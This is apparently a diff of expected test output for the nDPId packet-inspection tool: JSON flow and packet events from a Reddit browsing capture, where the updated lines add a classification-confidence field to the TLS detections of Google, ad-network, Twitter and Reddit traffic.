{"version":"TLSv1.3","client_requested_server_name":"tpc.googlesyndication.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+01005{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9436,"source":"reddit.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690926,"flow_last_seen":1605291691003,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"ts_msec":1605291691003,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36970,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.3","client_requested_server_name":"tpc.googlesyndication.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+01005{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9446,"source":"reddit.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690926,"flow_last_seen":1605291691004,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"ts_msec":1605291691004,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36968,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.3","client_requested_server_name":"tpc.googlesyndication.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9475,"source":"reddit.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":2,"flow_last_seen":1605291691029,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605291691029,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgPAAAAAAAAIAEqAcsBIEmLB5kd7IUo3\/YpAbuQbO1037mLrsxooBJXgErvAAACBAV4AQMDAwQCCArC10wIuJU7dg=="}
 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9476,"source":"reddit.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":3,"flow_last_seen":1605291691029,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":74,"pkt_l4_len":20,"ts_msec":1605291691029,"pkt":"qtsDr8lk5EKm5WPyht1gBfK\/ABQGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIDwAAAAAAACABkGwBu4uuzGgAAAAAUAQAANo6AAA="}
 00604{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":11226,"source":"reddit.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291696948,"flow_last_seen":1605291696948,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1605291696948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::34d3:acec","src_port":47006,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11226,"source":"reddit.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":1,"flow_last_seen":1605291696948,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605291696948,"pkt":"qtsDr8lk5EKm5WPyht1gDNdJACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAAA006zst54Bu3jHKBQAAAAAoAL9IL45AAACBAWgBAIIClIhuaMAAAAAAQMDBw=="}
 00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11227,"source":"reddit.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":2,"flow_last_seen":1605291696965,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605291696965,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAADTTrOwqAcsBIEmLB5kd7IUo3\/YpAbu3nh9OKxV4xygVoBJXgPOCAAACBAV4AQMDAwQCCArC12M3UiG5ow=="}
 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11228,"source":"reddit.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":3,"flow_last_seen":1605291696965,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"ts_msec":1605291696965,"pkt":"qtsDr8lk5EKm5WPyht1gDNdJACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAAA006zst54Bu3jHKBUfTisWgBAB+3eDAAABAQgKUiG5tMLXYzc="}
-00904{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11229,"source":"reddit.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291696948,"flow_last_seen":1605291696965,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605291696965,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::34d3:acec","src_port":47006,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"d9.flashtalking.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-00960{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":11233,"source":"reddit.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291696948,"flow_last_seen":1605291697033,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"ts_msec":1605291697033,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::34d3:acec","src_port":47006,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"d9.flashtalking.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-01374{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":11239,"source":"reddit.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1605291696948,"flow_last_seen":1605291697034,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":6001,"flow_avg_l4_payload_len":500,"midstream":0,"ts_msec":1605291697034,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::34d3:acec","src_port":47006,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"d9.flashtalking.com","server_names":"tag.device9.com,www.tag.device9.com,fp.zenaps.com,the.sciencebehindecommerce.com,d9.flashtalking.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=Arizona, L=Scottsdale, O=GoDaddy.com, Inc., OU=http:\/\/certs.godaddy.com\/repository\/, CN=Go Daddy Secure Certificate Authority - G2","subjectDN":"OU=Domain Control Validated, CN=tag.device9.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"8B:5C:A4:62:70:92:3A:09:C3:72:49:B2:A2:22:32:16:22:87:9D:F3"}}
-00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":39,"flow_first_seen":1605291688749,"flow_last_seen":1605291688963,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":10966,"flow_avg_l4_payload_len":281,"midstream":0,"ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2004","src_port":57282,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Google","breed":"Acceptable","category":"Web"}}
-00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1605291690384,"flow_last_seen":1605291690520,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":6642,"flow_avg_l4_payload_len":201,"midstream":0,"ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::2002","src_port":59336,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Google","breed":"Acceptable","category":"Web"}}
-00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":782,"flow_first_seen":1605291687514,"flow_last_seen":1605291688963,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6288,"flow_tot_l4_payload_len":596288,"flow_avg_l4_payload_len":762,"midstream":0,"ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:789d","src_port":48240,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Twitter","breed":"Fun","category":"SocialNetwork"}}
-00704{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":85,"flow_first_seen":1605291690926,"flow_last_seen":1605291691284,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2470,"flow_tot_l4_payload_len":37085,"flow_avg_l4_payload_len":436,"midstream":0,"ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36964,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"}}
-00702{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1605291690926,"flow_last_seen":1605291691053,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":3817,"flow_avg_l4_payload_len":190,"midstream":0,"ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36966,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"}}
-00702{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1605291690926,"flow_last_seen":1605291691064,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":3815,"flow_avg_l4_payload_len":200,"midstream":0,"ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36968,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"}}
-00702{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1605291690926,"flow_last_seen":1605291691062,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":3816,"flow_avg_l4_payload_len":190,"midstream":0,"ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36970,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"}}
-00631{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1605291690992,"flow_last_seen":1605291691029,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36972,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00930{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11229,"source":"reddit.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291696948,"flow_last_seen":1605291696965,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605291696965,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::34d3:acec","src_port":47006,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"d9.flashtalking.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00986{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":11233,"source":"reddit.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291696948,"flow_last_seen":1605291697033,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"ts_msec":1605291697033,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::34d3:acec","src_port":47006,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"d9.flashtalking.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+01400{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":11239,"source":"reddit.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1605291696948,"flow_last_seen":1605291697034,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":6001,"flow_avg_l4_payload_len":500,"midstream":0,"ts_msec":1605291697034,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::34d3:acec","src_port":47006,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"d9.flashtalking.com","server_names":"tag.device9.com,www.tag.device9.com,fp.zenaps.com,the.sciencebehindecommerce.com,d9.flashtalking.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=Arizona, L=Scottsdale, O=GoDaddy.com, Inc., OU=http:\/\/certs.godaddy.com\/repository\/, CN=Go Daddy Secure Certificate Authority - G2","subjectDN":"OU=Domain Control Validated, CN=tag.device9.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"8B:5C:A4:62:70:92:3A:09:C3:72:49:B2:A2:22:32:16:22:87:9D:F3"}}
+00720{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":39,"flow_first_seen":1605291688749,"flow_last_seen":1605291688963,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":10966,"flow_avg_l4_payload_len":281,"midstream":0,"ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2004","src_port":57282,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}}
+00719{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1605291690384,"flow_last_seen":1605291690520,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":6642,"flow_avg_l4_payload_len":201,"midstream":0,"ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::2002","src_port":59336,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}}
+00720{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":782,"flow_first_seen":1605291687514,"flow_last_seen":1605291688963,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6288,"flow_tot_l4_payload_len":596288,"flow_avg_l4_payload_len":762,"midstream":0,"ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:789d","src_port":48240,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Twitter","breed":"Fun","category":"SocialNetwork"}}
+00730{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":85,"flow_first_seen":1605291690926,"flow_last_seen":1605291691284,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2470,"flow_tot_l4_payload_len":37085,"flow_avg_l4_payload_len":436,"midstream":0,"ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36964,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"}}
+00728{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1605291690926,"flow_last_seen":1605291691053,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":3817,"flow_avg_l4_payload_len":190,"midstream":0,"ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36966,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"}}
+00728{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1605291690926,"flow_last_seen":1605291691064,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":3815,"flow_avg_l4_payload_len":200,"midstream":0,"ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36968,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"}}
+00728{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1605291690926,"flow_last_seen":1605291691062,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":3816,"flow_avg_l4_payload_len":190,"midstream":0,"ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36970,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"}}
+00667{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1605291690992,"flow_last_seen":1605291691029,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36972,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00610{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1605291690992,"flow_last_seen":1605291691029,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36972,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1605291687934,"flow_last_seen":1605291688340,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":6623,"flow_avg_l4_payload_len":245,"midstream":0,"ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::1736:86f1","src_port":44264,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS","breed":"Safe","category":"Advertisement"}}
-00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":847,"flow_first_seen":1605291684452,"flow_last_seen":1605291698703,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6245,"flow_tot_l4_payload_len":482020,"flow_avg_l4_payload_len":569,"midstream":0,"ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56558,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}}
-00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":114,"flow_first_seen":1605291688843,"flow_last_seen":1605291691232,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2416,"flow_tot_l4_payload_len":69230,"flow_avg_l4_payload_len":607,"midstream":0,"ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80c::2003","src_port":47302,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Google","breed":"Acceptable","category":"Web"}}
-00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1605291684481,"flow_last_seen":1605291684654,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":4527,"flow_avg_l4_payload_len":266,"midstream":0,"ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56560,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}}
